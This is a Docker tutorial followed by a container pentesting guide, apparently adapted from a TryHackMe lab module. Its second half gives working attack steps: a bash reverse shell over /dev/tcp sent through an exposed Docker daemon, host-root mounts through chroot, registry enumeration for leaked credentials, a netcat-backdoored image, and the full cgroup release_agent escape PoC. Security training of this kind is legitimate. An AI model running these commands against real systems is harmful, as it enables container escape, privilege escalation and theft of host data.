Docker Security & Pentesting

DISCLAIMER

This is a module from TryHackMe; some sections have been modified.

Definitions

  • Docker Engine: essentially an API/daemon that runs on the host operating system and communicates between the OS and containers to access the system's hardware. The Docker Engine lets us connect containers together, export and import containers, and transfer files between containers.

  • Docker Container: containers are made to run independently of other processes, using only the resources they need. This means containers use only their share of memory and processing and do not interact with one another unless configured to.

  • Docker Hub: users can create, store, manage, test, and distribute Docker images using the cloud-based registry known as Docker Hub.

  • Docker Image: a Docker image serves as a template for constructing containers. Images are produced with the build command; compared to virtual machines, Docker images build significantly more quickly and use far less storage.

  • Docker Registry: where Docker images are kept. Users can utilize a public registry like Docker Hub or run a local/private registry.


How Are Docker Containers Built?

Docker uses a simple, declarative syntax (the Dockerfile) that lets developers instruct how a container should be built and what it runs (Docker Compose files, covered later, use YAML). This is a significant reason why Docker is so portable and easy to debug: given the same instructions, a container can be built and run on any device. All instructions are stored in the image, which dictates how the container will be built and deployed; that is why containers are shared as images.


Cheat sheet

docker system info

docker rm CONTAINER_ID
docker stop CONTAINER_ID
docker rm -f CONTAINER_ID     # -f forcefully removes a running container
docker logs <container_id_or_name>
sudo netstat -tuln | grep ':80'
sudo lsof -i :80

docker image ls --digests


Building a Docker Container from Scratch

  • /var/lib/docker: Docker's data directory (images, containers, volumes)

  • /snap/bin/docker: the Docker binary when installed via snap

  • /etc/docker/daemon.json: the Docker daemon configuration file

  • ~/.docker: per-user Docker-related configuration files

Create Your Dockerfile for the Docker Image

Docker requires a working Dockerfile for its builds. Here, we will create a Dockerfile that sets up an Ubuntu image with Apache acting as a web server and using the standard HTTP port 80.

At the command prompt (either via SSH or Lish in the Linode Manager), create and change to a new directory:

mkdir ~/mydockerbuild && cd ~/mydockerbuild

Dockerfiles are formatted as a series of lines, each consisting of:

  • an instruction

  • its argument(s)

Example Dockerfile:

FROM ubuntu
MAINTAINER John Doe jdoe@example.com
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update
RUN apt-get upgrade -y
RUN apt-get install apache2 -y
RUN apt-get clean
RUN touch test.txt
EXPOSE 80
CMD ["apache2ctl","-D","FOREGROUND"]

Basic Definitions

  • FROM: Define the base image, such as ubuntu or debian, used for the build process. Required in every Dockerfile.

  • MAINTAINER: Define the full name and email address of the image creator.

Variables

  • ENV: Set environment variables that persist when the container is deployed.

  • ARG: Set a passable build-time variable. Can be used as an alternative to ENV to create a variable that does not persist when the container is deployed from the image.

Command Execution

  • RUN: Execute commands, such as package installation commands, on a new image layer.

  • CMD: Execute a specific command within the container that is deployed with the image, or set default parameters for an ENTRYPOINT instruction. Only one is used per Dockerfile.

  • ENTRYPOINT: Set a default application to be used every time a container is deployed with the image. Only one is used per Dockerfile.

  • USER: Set the user (UID or username) used to run subsequent commands in the container.

  • WORKDIR: Set the container path where subsequent Dockerfile commands are executed.

[Note] RUN, CMD, and ENTRYPOINT can each be run in shell form, which takes normal arguments, or exec form, which takes arguments as a JSON array. Because exec form does not invoke a command shell, it is generally preferred and utilized in this guide.

Data Management

  • ADD: Copy files from a source to the image’s filesystem at the set destination with automatic tarball and remote URL handling.

  • COPY: Similar to ADD but without automatic tarball and remote URL handling.

  • VOLUME: Enable access from a specified mount point in the container to a directory on the host machine.

Networking

  • EXPOSE: Expose a specific port to enable networking between the container and the outside world.


Building the Image

After we have written the Dockerfile, we can build the image:

docker build -t testdocker .

[-t] names the resulting image; [.] specifies the build context, the directory containing the Dockerfile we created above.

Important notice for image creation

  1. Caching: Docker builds images in layers, and it tries to cache intermediate layers to speed up the build process. If the contents of the Dockerfile and the context (files and directories used during the build) haven't changed since the previous build, Docker may reuse cached layers, resulting in the new image having the same creation time as the previous one.

  2. Tagging: When you build a new Docker image with the same tag as a previous one (e.g., latest or a custom tag), Docker overwrites the previous image under that tag. While the content of the image may differ, metadata associated with the image (including creation time) can be reused from cache. The [--no-cache] option forces Docker to rebuild all layers from scratch:

docker build --no-cache -t your_image_name .

Running a Docker Container

We can run a container after building the image with the below command.

docker run -d --name apachewebserver -p 80:80 testdocker

The basic syntax is:

docker run [OPTIONS] IMAGE_NAME [COMMAND]

example

docker run -it nginx /bin/bash


docker run --name kali -it kalilinux/kali-rolling /bin/bash

[-it] attaches an interactive terminal so we can interact with the container and the given command.

The below command runs the container in the background (detached mode):

docker run -d nginx /bin/bash

The below command binds a port for the container to listen on. You would use this option when running an application or service (such as a web server) in the container that you wish to access by navigating to the host's IP address.

docker run -p 80:80 nginx

The below command removes the container once it has finished running.

docker run --rm nginx

Once you have finished running the container, you can view a list of the running and stopped containers using the below command.

docker ps -a

The output lists the container's ID, the command the container is running, when the container was created, which ports are mapped, and the name of the container.


Building a Container by Downloading & Running a Ready-Made Docker Image

We need two items:

  • The container image name: for example, nginx.

  • The tag: used to specify different variations of an image, e.g. the same name with different tags indicating different versions.

  • Format: [name:tag]

docker pull ubuntu:latest

Pulling the latest or a specific version of an image:

docker pull ubuntu:latest
docker pull ubuntu:22.04

Auditing Docker Image

To list all images stored on the local system, verify an image downloaded correctly, and view more information about it:

docker image ls

Removing a docker image

docker image rm ubuntu:22.04

Running & Building Multiple Containers Together

Docker Compose allows us to combine several "microservices" into one "service" so we can run more dynamic and complex applications, such as an Apache web server with a MySQL database. Applications often require additional services to run, which we cannot do in a single container; [Docker Compose] is the solution for that.

Installing Docker Compose

https://docs.docker.com/compose/reference/
https://docs.docker.com/compose/install/

Docker-compose.yml

This file is extremely important for efficient deployment, management and running of the services.

https://docs.docker.com/compose/compose-file/

Scenario: let's assume we want to run an e-commerce website that uses a MySQL database. We need more than one container, therefore we choose [docker compose]. First we create the [YAML] config file:

version: '3.3'
services:
  web:
    build: ./web
    networks:
      - ecommerce
    ports:
      - '80:80'


  database:
    image: mysql:latest
    networks:
      - ecommerce
    environment:
      - MYSQL_DATABASE=ecommerce
      - MYSQL_USERNAME=root
      - MYSQL_ROOT_PASSWORD=helloword
    
networks:
  ecommerce:

Key directives: [version] [services] [build] [networks] [ports]


Docker vs Virtual Machines

Docker looks similar to a virtual machine, but the difference is that a container runs directly on the kernel of the host, whereas a virtual machine runs its own kernel on virtualized hardware.


When Docker Comes to Pentesting

The concept of pentesting Docker containers


How Do Containers Get Compromised?

Usually attackers will compromise a container through its external-facing application. If it is a web application, it can be exploited in the same way as any other web application. So attackers compromise the software/service/application running within a specific container using traditional tools and attack procedures, then leverage that access, with small modifications, to exploit the internals of the environment.

If an attacker manages to exploit a web application running inside a container and gain shell access, the exploitation and access will usually be limited to that container environment alone and may not lead to exploitation of the container's host. Still, sometimes this single/monolithic environment provides post-exploitation opportunities for attackers, just as a traditional network would.

Important remarks before you start

  • Every docker container has an ID and you will need this ID when you want to enumerate the container.

Indications of a Docker container:

  • A .dockerenv file in the root of the filesystem.

  • File permissions in users' home directories showing numeric IDs instead of names.

  • Some or all of the users owning home directories do not exist in /etc/passwd, which means the home directory was mounted from the host. Check with:

mount | grep username

  • Docker appears in the process list:

ps auxww | grep docker
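The /etc/passwd check above can be sketched in Python. This is a hypothetical helper, not part of the original module; the sample passwd text and home-directory names are made up for illustration.

```python
def users_missing_from_passwd(home_dirs, passwd_text):
    """Return home-directory names with no matching user in /etc/passwd.

    A non-empty result suggests the home directories were mounted from the host.
    """
    # /etc/passwd lines look like: name:x:uid:gid:gecos:home:shell
    local_users = {line.split(":")[0] for line in passwd_text.splitlines() if line}
    return sorted(set(home_dirs) - local_users)

# Sample data for illustration (not from a live system):
passwd = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/usr/sbin:/usr/sbin/nologin\n"
print(users_missing_from_passwd(["root", "alice"], passwd))  # ['alice']
```

On a real target you would feed it the directory names under /home and the contents of /etc/passwd.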

Enumeration of the docker containers.

Local Dockers

These are the containers you find when you first get a foothold on a machine.

Writable Docker-socket

We check whether /var/run/docker.sock is writable and by whom. We also check the running processes to see if the Docker daemon is listening on a TCP port. The aim is to escape the container and dump the root filesystem.

Listing docker containers

docker -H tcp://localhost:8080 container ls

Executing commands

docker -H tcp://localhost:8080 container exec sweettoothinc whoami

Executing reverse shell

docker -H tcp://localhost:8080 container exec sweettoothinc bash -c "bash -i >& /dev/tcp/$MY_IP/9999 0>&1"

[Note: more techniques are covered in the RCE via Exposed Docker Daemon section]


Docker Containers Vulnerability


Docker Registry Exploitation

Goal

The goal of exploiting Docker registries is grabbing the manifest file, which contains valuable information about the application, such as its size and layers, in addition to the [history] section that may reveal commands and credentials used when the Docker image was first built and run. (https://docs.docker.com/registry/)

Definition

At their core, Docker registries serve as repositories for published Docker images. Creators of Docker images can easily switch between different iterations of their apps and share them with others by using repositories. Although there are public registries like Docker Hub, many organizations using Docker have their own "private" registry.

Discovery

Docker registries run on port 5000 (sometimes 7000) by default, but this can be changed. If you find these ports in your nmap scan, a Docker registry may be running.

Enumeration

We can interact with the registry's HTTP API using several tools:

  • postman [https://www.postman.com/downloads/]

  • Insomnia [https://insomnia.rest/download/]


Listing all stored repos in the Docker registry

We send a GET request to the target domain on the port the Docker registry is listening on:

http://docker-domain.com:5000/v2/_catalog

Listing the associated tags with the selected repo

From the last step, we will have listed all the repositories published on the target's Docker registry. In order to interact with a specific repository we need its tags, which specify version variants. Let's say one of the repositories is named web/app; to list its tags we send a GET request to:

http://docker-domain.com:5000/v2/web/app/tags/list

Grabbing the Manifest file

The manifest file contains pieces of information about the application, such as its size and layers, so it is a useful artifact to get hold of. We can retrieve it with the below GET request after selecting the repository and the tag; let's assume the tag is [tag1].

http://docker-domain.com:5000/v2/web/app/manifests/tag1

In the manifest file you will be able to extract useful information about the commands that were executed when the Docker image was first published and run. These commands may contain sensitive information such as passwords and database credentials.
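The [history] mining described above can be sketched in Python. This assumes a schema-1 manifest (the JSON shape older registries serve for manifest requests), where each history entry is a v1Compatibility JSON string whose container_config.Cmd holds the build command; the manifest fragment below is made up for illustration.

```python
import json

def commands_from_manifest(manifest):
    """Extract build commands from a schema-1 registry manifest dict."""
    commands = []
    for entry in manifest.get("history", []):
        # Each history entry wraps a JSON string describing one layer
        compat = json.loads(entry["v1Compatibility"])
        cmd = compat.get("container_config", {}).get("Cmd") or []
        commands.append(" ".join(cmd))
    return commands

# Made-up manifest fragment illustrating a leaked credential:
manifest = {
    "history": [
        {"v1Compatibility": json.dumps({
            "container_config": {"Cmd": ["/bin/sh", "-c", "mysql -u root -pS3cret"]}
        })}
    ]
}
for cmd in commands_from_manifest(manifest):
    print(cmd)  # /bin/sh -c mysql -u root -pS3cret
```

Against a live registry you would first fetch the manifest JSON with a GET request as shown above, then run it through the same extraction.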


Docker Image Reverse Engineering

Goal

The goal of reverse engineering Docker images is to obtain detailed information on the commands and instructions used to build the image. This can reveal useful information such as credentials and commands.

Pulling The image

First we pull the target image from its repository.

docker pull domain.com/ubuntu:latest

Then confirm the image was obtained by running:

docker images

Reverse Engineering the Image

Dive (a tool for exploring a Docker image layer by layer) acts as a man-in-the-middle between ourselves and Docker when we use it to run a container, letting us inspect each layer and the command that created it.

Uploading Malicious Docker Images


When discussing the exploitation of Docker registries, one potential avenue for attackers is uploading malicious Docker images. This malicious activity involves uploading Docker images that contain harmful payloads, vulnerabilities, or backdoors, with the intention of compromising systems or stealing sensitive information.

Goal

The goal of uploading malicious Docker images is to introduce unauthorized or malicious code into the target environment. Attackers may aim to exploit vulnerabilities in Docker images or containers to gain unauthorized access, execute arbitrary commands, or exfiltrate data from the compromised systems.

Methods

  1. Malicious Payloads: images that embed harmful code which executes when the container runs.

  2. Backdoors: malicious images may contain backdoors or hidden functionality that allows attackers to maintain persistence.

  3. Exploiting Vulnerabilities: uploading Docker images that contain known vulnerabilities or exploit code targeting weaknesses in specific software components, enabling further exploitation or lateral movement.

Detection and Mitigation

  • Image Scanning

  • Access Controls

  • Content Validation

  • Container Isolation

  • Continuous Monitoring


Evidence

[1]"Dockerfile" that uses the Docker RUN instruction to execute "netcat" within the container to connect to our machine!

[2]We compile this into an image with docker build. Once compiled and added to the vulnerable registry, we set up a listener on our attacker machine and wait for the new image to be executed by the target.


RCE via Exposed Docker Daemon

Unix Socket 101 (No Travel Adapter Required)

A UNIX socket (UNIX domain socket) accomplishes the same job as its networking sibling, moving data, albeit all within the host itself by using the filesystem rather than networking interfaces/adapters; it is an essential building block for Interprocess Communication (IPC) in an operating system. Because UNIX sockets use the filesystem directly, you can use filesystem permissions to decide who or what can read/write. An interesting benchmark compared both socket types for querying a MySQL database: a considerably higher number of queries per second was achieved over UNIX sockets, and database systems such as Redis are known for their performance partly for this reason. Other properties: bi-directional communication, stream or datagram mode, filesystem permissions.
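A minimal sketch of UNIX-socket IPC in Python, to show that the endpoint is just a filesystem path whose permissions gate access (the socket path and messages here are made up for the demo):

```python
import os, socket, tempfile, threading

sock_path = os.path.join(tempfile.mkdtemp(), "demo.sock")
srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
srv.bind(sock_path)            # the endpoint appears as a file on disk
os.chmod(sock_path, 0o660)     # so normal file permissions control access
srv.listen(1)

def echo_once():
    # Accept one client and echo its message back with a prefix
    conn, _ = srv.accept()
    conn.sendall(b"pong: " + conn.recv(64))
    conn.close()

t = threading.Thread(target=echo_once)
t.start()

cli = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
cli.connect(sock_path)         # no IP or port involved, just the path
cli.sendall(b"ping")
reply = cli.recv(64)
cli.close(); t.join(); srv.close()
print(reply)  # b'pong: ping'
```

Docker's /var/run/docker.sock works the same way, which is why membership in the docker group (i.e. write access to that file) is equivalent to controlling the daemon.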

How does this pertain to Docker?

Users interact with Docker through the Docker Engine. Commands such as docker pull or docker run are sent over a socket; this can be either a UNIX or a TCP socket, but by default it is a UNIX socket (/var/run/docker.sock). This is why you must be a member of the "docker" group to use the docker command.

Automating all the things

Developers love to automate, and this is proven nonetheless with Docker. By default Docker uses a UNIX socket, meaning it can only be used from the host itself. However, someone may wish to execute Docker commands remotely, for example from management tools like Portainer or DevOps applications like Jenkins, to test their program. For that, the daemon must use a TCP socket instead, permitting Docker daemon traffic over the network interface and ultimately exposing it to the network for us to exploit.


Confirming vulnerability

After enumerating the port with nmap (2375 is the default unencrypted Docker daemon port), confirm with:

curl http://10.10.69.250:2375/version

Note that we receive a response with all sorts of data about the host - lovely!
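The probe can be sketched in Python. To keep the snippet self-contained it spins up a local stand-in HTTP server rather than talking to a real daemon; against a live target you would request http://HOST:2375/version the same way. The version values below are invented.

```python
import json, threading, urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class FakeDaemon(BaseHTTPRequestHandler):
    """Stand-in for an exposed Docker daemon answering GET /version."""
    def do_GET(self):
        body = json.dumps({"Version": "24.0.0", "Os": "linux"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *args):  # keep the demo quiet
        pass

srv = HTTPServer(("127.0.0.1", 0), FakeDaemon)  # port 0: pick any free port
threading.Thread(target=srv.serve_forever, daemon=True).start()

url = f"http://127.0.0.1:{srv.server_port}/version"  # real target: port 2375
info = json.loads(urllib.request.urlopen(url).read())
srv.shutdown()
print(info["Os"])  # a JSON reply like this confirms an exposed, unauthenticated API
```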

Execute

We'll perform our first Docker command by using the "-H" switch to specify the remote instance and list the running containers:

docker -H tcp://10.10.69.250:2375 ps

Experiment

[network ls]: lists container networks; we could use this to discover other applications running and pivot to them from our machine. [images]: lists images; data can also be exfiltrated by reverse engineering an image. [exec]: executes commands in a container. [run]: starts a new container.

Gaining shell

docker -H tcp://10.10.69.250:2375 run -v /:/mnt --rm -it alpine chroot /mnt sh

docker -H tcp://10.10.69.250:2375 run -v /:/mnt --rm -it frontend chroot /mnt sh

Experiment with some Docker commands to enumerate the machine, try to gain a shell onto some of the containers and take a look at using tools such as rootplease to use Docker to create a root shell on the device itself.


Escape via Exposed Docker Daemon

Looking for the exposed Docker socket

cd /var/run    # look for docker.sock
groups         # the user must be in the docker group

Mount host volumes

[Note: (1) the user must be in the docker group. (2) If we can see the containers but cannot see any images, we cannot perform this mount.]

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

  • docker run: run a Docker container.

  • -v /:/mnt: mounts the root directory of the host (/) into the /mnt directory inside the container. This allows the container to access and manipulate files and directories on the host filesystem. The syntax for the -v option is -v <host_path>:<container_path>.

  • --rm: tells Docker to automatically remove the container when it exits.

  • -it: these options are used together to allocate a pseudo-TTY (-t) and keep STDIN open (-i) so that you can interact with the container's shell.

  • alpine: a lightweight Linux distribution often used for Docker containers.

  • chroot /mnt sh: changes the root directory of the current process to /mnt using the chroot command, effectively making /mnt the new root directory within the container, and starts a new shell (sh) within this chroot environment.


Shared Namespaces

Let's backpedal a little bit...

Containers have networking capabilities and their own file storage; we have previously used SSH to connect to containers and there were files present! They achieve this by using three components of the Linux kernel:

  • Namespaces

  • Cgroups

  • OverlayFS

Namespaces essentially segregate system resources such as processes, files and memory away from other namespaces.

Every process running on Linux will be assigned two things:

  • A namespace

  • A process identifier (PID)

Namespaces are how containerization is achieved! Processes can only "see" the processes in the same namespace, so in theory there are no conflicts. Take Docker for example: every new container runs in a new namespace, although the container may be running multiple applications (and in turn, processes). [Example] In a ps listing we can see the user each process runs as and the process number; the last column shows the command that is running. On a typical host, with for instance a Docker command and an instance of Google Chrome running, there is a considerable number of processes.

Let's list the processes running in our Docker container using ps aux. It's important to note that we only have 6 processes running. This difference is a great indicator that we're in a container.

Here's why it matters to us:

Put simply, process #1 is the first process started when the system boots: the system's init, for example systemd on the latest versions of Ubuntu. Process numbers increment from there, and every other process must be started by another process.

We can use process #1's namespace on an operating system to escalate our privileges. Whilst containers are designed to use namespaces to isolate themselves from one another, they can instead be made to share the host computer's namespaces rather than be isolated from them, and this gives us a nice opportunity to escape!
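The process-count observation can be reproduced in a few lines of Python by counting the numeric entries under /proc (Linux only; the threshold of 10 is a rough heuristic, not part of the original module). On a typical host the count is in the hundreds, while a single-service container often shows fewer than ten.

```python
import os

def pid_count():
    """Count live processes by listing numeric directories under /proc."""
    return sum(1 for name in os.listdir("/proc") if name.isdigit())

n = pid_count()
print(n, "processes visible in this PID namespace")
if n < 10:  # heuristic threshold, an assumption for this sketch
    print("very few processes: likely inside a container")
```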

Getting started

Run ps aux; now we can see the whole system's processes...

The exploit here is actually rather trivial, but I'll digress nonetheless. We'll be invoking the nsenter command. To summarise, this command allows you to start processes and place them within the same namespace as another process.


Exploit


Misconfigured Privileges (Deploy #2)

Understanding Capabilities

Containers running in user mode interact with the operating system through the Docker Engine. Privileged containers, however, do not do this... instead, they bypass the Docker engine and have direct communication with the OS.

What does this mean for us?

If a container is running with privileged access to the OS, we can effectively execute commands as root.

We can use a system package such as libcap2-bin's capsh to check the privileges of the container. Run the below command inside a Docker container shell:

capsh --print

capsh --print | grep sys_admin

This capability permits us to do multiple things (see the Linux capabilities documentation), but we're going to focus on the ability given to us via "sys_admin" to mount files from the host OS into the container.
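Checking for cap_sys_admin can be scripted. The helper below parses the "Current:" line of capsh --print output; the sample string is hard-coded (and invented) so the snippet runs anywhere, but inside a container you would feed it the real capsh output.

```python
def has_capability(capsh_output, cap):
    """Return True if `cap` appears in the Current: line of capsh --print output."""
    for line in capsh_output.splitlines():
        if line.startswith("Current:"):
            # Line looks like: Current: = cap_chown,cap_sys_admin,...+ep
            caps = line.split(":", 1)[1].strip().lstrip("= ").split("+")[0]
            return cap in {c.strip() for c in caps.split(",")}
    return False

# Invented sample output for illustration:
sample = "Current: = cap_chown,cap_sys_admin,cap_net_raw+ep\n"
print(has_capability(sample, "cap_sys_admin"))  # True
```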

Exploitation

The code snippet below is based upon (but is a modified version of) the Proof of Concept (PoC) created by Trail of Bits, where the inner workings of this exploit are detailed well.

We aim mainly to mount files from the host filesystem into the container. In the container shell, execute the below commands:

1.  mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

2.  echo 1 > /tmp/cgrp/x/notify_on_release

3.  host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

4.  echo "$host_path/exploit" > /tmp/cgrp/release_agent 

5.  echo '#!/bin/sh' > /exploit

6.  echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit

7.  chmod a+x /exploit

8.  sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Let's briefly summarize what happens here:

[1] We create a cgroup for the Linux kernel to use to write and execute our exploit. The kernel uses "cgroups" to manage processes on the operating system; since we have the capability to manage cgroups as root on the host, we mount the cgroup filesystem to "/tmp/cgrp" in the container.

[2] For our exploit to execute, we'll need to tell the kernel to run our code. By writing "1" to "/tmp/cgrp/x/notify_on_release", we're telling the kernel to execute something once the "cgroup" is released. (Paul Menage., 2004)

[3] We find out where the container's files are stored on the host and save that path in a variable.

[4] We then echo the host-side path of our "/exploit" script into "release_agent", which is what will be executed by the kernel once the "cgroup" is released.

[5] Let's turn our exploit into a shell on the host

[6] Execute a command to echo the host flag into a file named "flag.txt" in the container, once "/exploit" is executed

[7] Make our exploit executable!

[8] We spawn a process inside the cgroup by writing its PID into "/tmp/cgrp/x/cgroup.procs"; when that process exits, the cgroup is released and the kernel runs our release agent on the host.
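Step [3]'s sed expression simply pulls the overlay upperdir= value out of /etc/mtab. The same extraction can be sketched in Python, run here against a made-up mtab line so the snippet is self-contained:

```python
import re

def overlay_upperdir(mtab_text):
    """Mirror the PoC's sed: grab the upperdir= path from /etc/mtab text."""
    # Matches "...perdir=<path>," i.e. the upperdir= mount option
    m = re.search(r"perdir=([^,]*)", mtab_text)
    return m.group(1) if m else None

# Invented sample mtab line for illustration:
sample = ("overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA,"
          "upperdir=/var/lib/docker/overlay2/abc123/diff,"
          "workdir=/var/lib/docker/overlay2/abc123/work 0 0")
print(overlay_upperdir(sample))  # /var/lib/docker/overlay2/abc123/diff
```

That path is where the container's writable layer lives on the host, which is why the release agent written in step [4] must reference it.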


Securing Your Container

Let's reflect back on the vulnerabilities that we have exploited. Not only have we learnt about the technology that is containerization, but also how these containers are a mere abstraction of the host's operating system.

  1. The Principle of Least Privilege: Whilst this is an over-arching theme of InfoSec as a whole, we'll apply it to Docker...

Remember Docker images? The commands in these images will execute as root unless told otherwise. Say you create a Docker image for your web server; in that case, the service will run as root. If an attacker managed to exploit the web server, they would then have root permissions in the container and may be able to use the techniques outlined in Tasks 10 and 11.

  2. Docker Seccomp 101: Seccomp, or "secure computing", is a security feature of the Linux kernel that restricts a container's capability by determining the system calls it can make. Docker applies seccomp security profiles to containers. For example, we can deny the container the ability to perform actions such as using the mount system call (see Task 10 for a demonstration of this vulnerability) or other Linux system calls.

  3. Securing your Daemon: In later installs of the Docker engine, running a registry relies on implementing self-signed SSL certificates behind a web server, where these certificates must then be distributed to and trusted on every device that will interact with the registry. This is quite the hassle for developers wanting to set up quick environments, which goes against the entire point of Docker.


Determining if we're in a container

Listing running processes: a very low process count in ps aux is a strong indicator of a container.

Looking for .dockerenv

Containers allow environment variables to be provided from the host operating system by the use of a ".dockerenv" file. This file is located in the "/" directory and will exist on a container even if no environment variables were provided: cd / && ls -lah

Those pesky cgroups
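A small Python check combining both indicators, the /.dockerenv marker and container-runtime strings in /proc/1/cgroup. This is Linux-only, and the keyword list is a heuristic of my choosing, not exhaustive:

```python
import os

def looks_like_container():
    """Heuristic: True if common container fingerprints are present."""
    if os.path.exists("/.dockerenv"):
        return True
    try:
        with open("/proc/1/cgroup") as f:
            data = f.read()
    except OSError:
        return False
    # Runtime names that commonly appear in a container's cgroup paths
    return any(word in data for word in ("docker", "kubepods", "lxc", "containerd"))

print(looks_like_container())
```

Note that cgroup v2 hosts may show only "/" in /proc/1/cgroup, so a False result does not rule a container out.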

Additional Material:

  • The Dirty COW kernel exploit

  • Exploiting runC (CVE-2019-5736)

  • Trail of Bits' capabilities demonstration

  • Cgroups101


  • The Great Escape

  • dockerrodeo

  • marketplace

  • Intro to docker
